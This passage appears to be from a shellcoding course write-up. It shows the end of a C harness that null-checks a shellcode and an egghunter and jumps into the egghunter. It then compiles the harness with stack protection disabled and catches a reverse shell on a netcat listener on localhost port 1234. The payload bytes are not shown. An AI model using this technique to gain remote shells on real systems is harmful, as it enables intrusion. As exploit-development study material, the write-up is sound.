if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length:  %d\n", strlen(shellcode));
printf("Egghunter Length:  %d\n", strlen(egghunter));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute egghunter
"jmp egghunter");
}

We compile myegg6.c and run it, while our listener is listening on port 1234:

gcc -m32 -fno-stack-protector -z execstack myegg6.c -o myegg6
nc -nlv 1234
./myegg6

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
whoami
slae